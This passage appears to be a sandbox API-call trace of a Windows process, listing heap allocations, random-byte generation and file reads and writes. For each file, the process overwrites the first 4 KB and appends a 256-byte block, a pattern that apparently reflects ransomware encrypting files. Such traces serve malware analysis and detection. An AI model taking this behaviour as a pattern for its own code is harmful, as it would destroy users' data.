[0076.360] GetProcessHeap () returned 0x4f10000 [0076.360] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0076.360] GetProcessHeap () returned 0x4f10000 [0076.360] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x220) returned 0x7cf6bf8 [0076.360] GetProcessHeap () returned 0x4f10000 [0076.360] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0076.360] GetProcessHeap () returned 0x4f10000 [0076.360] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12358 | out: hHeap=0x4f10000) returned 1 [0076.360] GetProcessHeap () returned 0x4f10000 [0076.360] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56898 | out: hHeap=0x4f10000) returned 1 [0076.360] GetProcessHeap () returned 0x4f10000 [0076.360] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7cf6bf8 | out: hHeap=0x4f10000) returned 1 [0076.360] GetProcessHeap () returned 0x4f10000 [0076.360] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56870 | out: hHeap=0x4f10000) returned 1 [0076.360] SetFilePointerEx (in: hFile=0x7b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0076.360] WriteFile (in: hFile=0x7b4, lpBuffer=0x7d7f878*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x84afd44, lpOverlapped=0x0 | out: lpBuffer=0x7d7f878*, lpNumberOfBytesWritten=0x84afd44*=0x100, lpOverlapped=0x0) returned 1 [0076.360] WriteFile (in: hFile=0x7b4, lpBuffer=0x84afd48*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x84afd44, lpOverlapped=0x0 | out: lpBuffer=0x84afd48*, lpNumberOfBytesWritten=0x84afd44*=0x4, lpOverlapped=0x0) returned 1 [0076.360] GetProcessHeap () returned 0x4f10000 [0076.360] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8b610d8 | out: hHeap=0x4f10000) returned 1 [0076.360] GetProcessHeap () returned 0x4f10000 [0076.361] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56528 | out: hHeap=0x4f10000) returned 1 [0076.361] GetProcessHeap () returned 0x4f10000 [0076.361] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d7f878 | out: hHeap=0x4f10000) returned 1 [0076.361] CloseHandle (hObject=0x7b4) returned 1 [0076.369] InterlockedExchangeAdd (in: Addend=0x40f168, Value=1 | out: Addend=0x40f168) returned 7 [0076.369] SetFilePointerEx (in: hFile=0x764, liDistanceToMove=0xfffffffc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0076.369] ReadFile (in: hFile=0x764, lpBuffer=0x84afd4c, nNumberOfBytesToRead=0x4, lpNumberOfBytesRead=0x84afd08, lpOverlapped=0x0 | out: lpBuffer=0x84afd4c*, lpNumberOfBytesRead=0x84afd08*=0x0, lpOverlapped=0x0) returned 1 [0076.369] SetFilePointerEx (in: hFile=0x764, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0076.369] GetProcessHeap () returned 0x4f10000 [0076.369] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7d7f878 [0076.369] GetProcessHeap () returned 0x4f10000 [0076.369] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x20) returned 0x7d56528 [0076.369] SystemFunction036 (in: RandomBuffer=0x7d56528, RandomBufferLength=0x20 | out: RandomBuffer=0x7d56528) returned 1 [0076.369] GetProcessHeap () returned 0x4f10000 [0076.369] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x1000) returned 0x8b610d8 [0076.369] ReadFile (in: hFile=0x764, lpBuffer=0x8b610d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x84afd08, lpOverlapped=0x0 | out: lpBuffer=0x8b610d8*, lpNumberOfBytesRead=0x84afd08*=0x1000, lpOverlapped=0x0) returned 1 [0076.444] SetFilePointerEx (in: hFile=0x764, liDistanceToMove=0xfffff000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0076.444] WriteFile (in: hFile=0x764, lpBuffer=0x8b610d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x84afd44, lpOverlapped=0x0 | out: lpBuffer=0x8b610d8*, lpNumberOfBytesWritten=0x84afd44*=0x1000, lpOverlapped=0x0) returned 1 [0076.444] GetProcessHeap () returned 0x4f10000 [0076.444] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12358 [0076.444] GetProcessHeap () returned 0x4f10000 [0076.444] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0076.444] GetProcessHeap () returned 0x4f10000 [0076.444] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x8, Ptr=0x7d12368, Size=0x20) returned 0x7d560a0 [0076.444] GetProcessHeap () returned 0x4f10000 [0076.444] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0076.444] GetProcessHeap () returned 0x4f10000 [0076.444] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x0, Ptr=0x7d12368, Size=0x20) returned 0x7d56870 [0076.444] GetProcessHeap () returned 0x4f10000 [0076.444] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0076.444] GetProcessHeap () returned 0x4f10000 [0076.444] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0076.444] GetProcessHeap () returned 0x4f10000 [0076.444] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0076.444] GetProcessHeap () returned 0x4f10000 [0076.444] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0076.444] GetProcessHeap () returned 0x4f10000 [0076.444] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0076.444] GetProcessHeap () returned 0x4f10000 [0076.444] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0076.444] GetProcessHeap () returned 0x4f10000 [0076.444] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0076.444] GetProcessHeap () returned 0x4f10000 [0076.444] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0076.444] GetProcessHeap () returned 0x4f10000 [0076.444] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0076.461] GetProcessHeap () returned 0x4f10000 [0076.461] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0076.461] GetProcessHeap () returned 0x4f10000 [0076.461] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0076.461] GetProcessHeap () returned 0x4f10000 [0076.461] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0076.461] GetProcessHeap () returned 0x4f10000 [0076.461] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0076.461] GetProcessHeap () returned 0x4f10000 [0076.461] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0076.461] GetProcessHeap () returned 0x4f10000 [0076.461] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0076.461] GetProcessHeap () returned 0x4f10000 [0076.461] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0076.461] GetProcessHeap () returned 0x4f10000 [0076.461] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0076.461] GetProcessHeap () returned 0x4f10000 [0076.461] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0076.461] GetProcessHeap () returned 0x4f10000 [0076.461] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0076.461] GetProcessHeap () returned 0x4f10000 [0076.461] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0076.461] GetProcessHeap () returned 0x4f10000 [0076.461] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0076.461] GetProcessHeap () returned 0x4f10000 [0076.461] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0076.461] GetProcessHeap () returned 0x4f10000 [0076.461] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0076.461] GetProcessHeap () returned 0x4f10000 [0076.462] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0076.462] GetProcessHeap () returned 0x4f10000 [0076.462] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0076.462] GetProcessHeap () returned 0x4f10000 [0076.462] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0076.462] GetProcessHeap () returned 0x4f10000 [0076.462] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0076.462] GetProcessHeap () returned 0x4f10000 [0076.462] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0076.462] GetProcessHeap () returned 0x4f10000 [0076.462] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0076.462] GetProcessHeap () returned 0x4f10000 [0076.462] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0076.462] GetProcessHeap () returned 0x4f10000 [0076.462] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0076.462] GetProcessHeap () returned 0x4f10000 [0076.462] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0076.462] GetProcessHeap () returned 0x4f10000 [0076.462] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0076.462] GetProcessHeap () returned 0x4f10000 [0076.462] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x24) returned 0x7d4bb68 [0076.462] GetProcessHeap () returned 0x4f10000 [0076.462] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0076.462] GetProcessHeap () returned 0x4f10000 [0076.462] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x40) returned 0x7d51418 [0076.462] GetProcessHeap () returned 0x4f10000 [0076.462] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d4bb68 | out: hHeap=0x4f10000) returned 1 [0076.462] GetProcessHeap () returned 0x4f10000 [0076.462] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f70a70 [0076.462] GetProcessHeap () returned 0x4f10000 [0076.462] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d51418 | out: hHeap=0x4f10000) returned 1 [0076.462] GetProcessHeap () returned 0x4f10000 [0076.462] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7d7f770 [0076.462] GetProcessHeap () returned 0x4f10000 [0076.462] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f70a70 | out: hHeap=0x4f10000) returned 1 [0076.462] GetProcessHeap () returned 0x4f10000 [0076.462] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0076.463] GetProcessHeap () returned 0x4f10000 [0076.463] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d7f770 | out: hHeap=0x4f10000) returned 1 [0076.463] GetProcessHeap () returned 0x4f10000 [0076.463] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0076.463] GetProcessHeap () returned 0x4f10000 [0076.463] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0076.463] GetProcessHeap () returned 0x4f10000 [0076.463] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0076.463] GetProcessHeap () returned 0x4f10000 [0076.463] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0076.463] GetProcessHeap () returned 0x4f10000 [0076.463] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0076.463] GetProcessHeap () returned 0x4f10000 [0076.463] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0076.463] GetProcessHeap () returned 0x4f10000 [0076.463] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0076.463] GetProcessHeap () returned 0x4f10000 [0076.463] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0076.463] GetProcessHeap () returned 0x4f10000 [0076.463] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0076.463] GetProcessHeap () returned 0x4f10000 [0076.463] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0076.463] GetProcessHeap () returned 0x4f10000 [0076.463] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0076.463] GetProcessHeap () returned 0x4f10000 [0076.463] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0076.463] GetProcessHeap () returned 0x4f10000 [0076.464] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0076.464] GetProcessHeap () returned 0x4f10000 [0076.464] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0076.464] GetProcessHeap () returned 0x4f10000 [0076.464] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0076.464] GetProcessHeap () returned 0x4f10000 [0076.464] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0076.464] GetProcessHeap () returned 0x4f10000 [0076.464] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0076.464] GetProcessHeap () returned 0x4f10000 [0076.464] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0076.464] GetProcessHeap () returned 0x4f10000 [0076.464] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0076.464] GetProcessHeap () returned 0x4f10000 [0076.464] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0076.464] GetProcessHeap () returned 0x4f10000 [0076.464] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0076.464] GetProcessHeap () returned 0x4f10000 [0076.464] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0076.464] GetProcessHeap () returned 0x4f10000 [0076.464] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0076.464] GetProcessHeap () returned 0x4f10000 [0076.464] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0076.464] GetProcessHeap () returned 0x4f10000 [0076.464] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x220) returned 0x7cf6bf8 [0076.464] GetProcessHeap () returned 0x4f10000 [0076.464] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0076.464] GetProcessHeap () returned 0x4f10000 [0076.464] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12358 | out: hHeap=0x4f10000) returned 1 [0076.465] GetProcessHeap () returned 0x4f10000 [0076.465] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56870 | out: hHeap=0x4f10000) returned 1 [0076.465] GetProcessHeap () returned 0x4f10000 [0076.465] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7cf6bf8 | out: hHeap=0x4f10000) returned 1 [0076.465] GetProcessHeap () returned 0x4f10000 [0076.465] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d560a0 | out: hHeap=0x4f10000) returned 1 [0076.465] SetFilePointerEx (in: hFile=0x764, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0076.465] WriteFile (in: hFile=0x764, lpBuffer=0x7d7f878*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x84afd44, lpOverlapped=0x0 | out: lpBuffer=0x7d7f878*, lpNumberOfBytesWritten=0x84afd44*=0x100, lpOverlapped=0x0) returned 1 [0076.465] WriteFile (in: hFile=0x764, lpBuffer=0x84afd48*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x84afd44, lpOverlapped=0x0 | out: lpBuffer=0x84afd48*, lpNumberOfBytesWritten=0x84afd44*=0x4, lpOverlapped=0x0) returned 1 [0076.465] GetProcessHeap () returned 0x4f10000 [0076.465] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8b610d8 | out: hHeap=0x4f10000) returned 1 [0076.465] GetProcessHeap () returned 0x4f10000 [0076.465] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56528 | out: hHeap=0x4f10000) returned 1 [0076.465] GetProcessHeap () returned 0x4f10000 [0076.465] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d7f878 | out: hHeap=0x4f10000) returned 1 [0076.465] CloseHandle (hObject=0x764) returned 1 [0076.467] InterlockedExchangeAdd (in: Addend=0x40f168, Value=1 | out: Addend=0x40f168) returned 9 [0076.467] SetFilePointerEx (in: hFile=0x76c, liDistanceToMove=0xfffffffc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0076.467] ReadFile (in: hFile=0x76c, lpBuffer=0x84afd4c, nNumberOfBytesToRead=0x4, lpNumberOfBytesRead=0x84afd08, lpOverlapped=0x0 | out: lpBuffer=0x84afd4c*, lpNumberOfBytesRead=0x84afd08*=0x0, lpOverlapped=0x0) returned 1 [0076.467] SetFilePointerEx (in: hFile=0x76c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0076.467] GetProcessHeap () returned 0x4f10000 [0076.467] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7d7f878 [0076.467] GetProcessHeap () returned 0x4f10000 [0076.467] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x20) returned 0x7d56528 [0076.467] SystemFunction036 (in: RandomBuffer=0x7d56528, RandomBufferLength=0x20 | out: RandomBuffer=0x7d56528) returned 1 [0076.467] GetProcessHeap () returned 0x4f10000 [0076.467] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x1000) returned 0x8b610d8 [0076.467] ReadFile (in: hFile=0x76c, lpBuffer=0x8b610d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x84afd08, lpOverlapped=0x0 | out: lpBuffer=0x8b610d8*, lpNumberOfBytesRead=0x84afd08*=0x1000, lpOverlapped=0x0) returned 1 [0076.521] SetFilePointerEx (in: hFile=0x76c, liDistanceToMove=0xfffff000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0076.521] WriteFile (in: hFile=0x76c, lpBuffer=0x8b610d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x84afd44, lpOverlapped=0x0 | out: lpBuffer=0x8b610d8*, lpNumberOfBytesWritten=0x84afd44*=0x1000, lpOverlapped=0x0) returned 1 [0076.521] GetProcessHeap () returned 0x4f10000 [0076.521] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12358 [0076.521] GetProcessHeap () returned 0x4f10000 [0076.521] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0076.521] GetProcessHeap () returned 0x4f10000 [0076.521] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x8, Ptr=0x7d12368, Size=0x20) returned 0x7d560a0 [0076.521] GetProcessHeap () returned 0x4f10000 [0076.521] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0076.521] GetProcessHeap () returned 0x4f10000 [0076.521] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x0, Ptr=0x7d12368, Size=0x20) returned 0x7d56870 [0076.521] GetProcessHeap () returned 0x4f10000 [0076.521] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0076.521] GetProcessHeap () returned 0x4f10000 [0076.521] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0076.521] GetProcessHeap () returned 0x4f10000 [0076.521] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0076.521] GetProcessHeap () returned 0x4f10000 [0076.521] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0076.521] GetProcessHeap () returned 0x4f10000 [0076.521] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0076.521] GetProcessHeap () returned 0x4f10000 [0076.522] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0076.522] GetProcessHeap () returned 0x4f10000 [0076.522] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0076.522] GetProcessHeap () returned 0x4f10000 [0076.522] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0076.522] GetProcessHeap () returned 0x4f10000 [0076.522] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0076.522] GetProcessHeap () returned 0x4f10000 [0076.522] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0076.522] GetProcessHeap () returned 0x4f10000 [0076.522] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0076.522] GetProcessHeap () returned 0x4f10000 [0076.522] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0076.522] GetProcessHeap () returned 0x4f10000 [0076.522] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0076.522] GetProcessHeap () returned 0x4f10000 [0076.522] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0076.522] GetProcessHeap () returned 0x4f10000 [0076.522] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0076.522] GetProcessHeap () returned 0x4f10000 [0076.522] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0076.522] GetProcessHeap () returned 0x4f10000 [0076.522] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0076.522] GetProcessHeap () returned 0x4f10000 [0076.522] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0076.522] GetProcessHeap () returned 0x4f10000 [0076.522] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0076.522] GetProcessHeap () returned 0x4f10000 [0076.522] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0076.522] GetProcessHeap () returned 0x4f10000 [0076.522] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0076.522] GetProcessHeap () returned 0x4f10000 [0076.522] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0076.522] GetProcessHeap () returned 0x4f10000 [0076.522] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0076.522] GetProcessHeap () returned 0x4f10000 [0076.522] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0076.522] GetProcessHeap () returned 0x4f10000 [0076.522] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0076.523] GetProcessHeap () returned 0x4f10000 [0076.523] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0076.523] GetProcessHeap () returned 0x4f10000 [0076.523] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0076.523] GetProcessHeap () returned 0x4f10000 [0076.523] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0076.523] GetProcessHeap () returned 0x4f10000 [0076.523] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0076.523] GetProcessHeap () returned 0x4f10000 [0076.523] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0076.523] GetProcessHeap () returned 0x4f10000 [0076.523] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0076.523] GetProcessHeap () returned 0x4f10000 [0076.523] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0076.523] GetProcessHeap () returned 0x4f10000 [0076.523] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0076.523] GetProcessHeap () returned 0x4f10000 [0076.523] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x24) returned 0x7d4bb68 [0076.523] GetProcessHeap () returned 0x4f10000 [0076.523] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0076.523] GetProcessHeap () returned 0x4f10000 [0076.523] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x40) returned 0x7d513d0 [0076.523] GetProcessHeap () returned 0x4f10000 [0076.523] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d4bb68 | out: hHeap=0x4f10000) returned 1 [0076.523] GetProcessHeap () returned 0x4f10000 [0076.523] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f70a70 [0076.523] GetProcessHeap () returned 0x4f10000 [0076.523] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d513d0 | out: hHeap=0x4f10000) returned 1 [0076.523] GetProcessHeap () returned 0x4f10000 [0076.523] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7d7f770 [0076.523] GetProcessHeap () returned 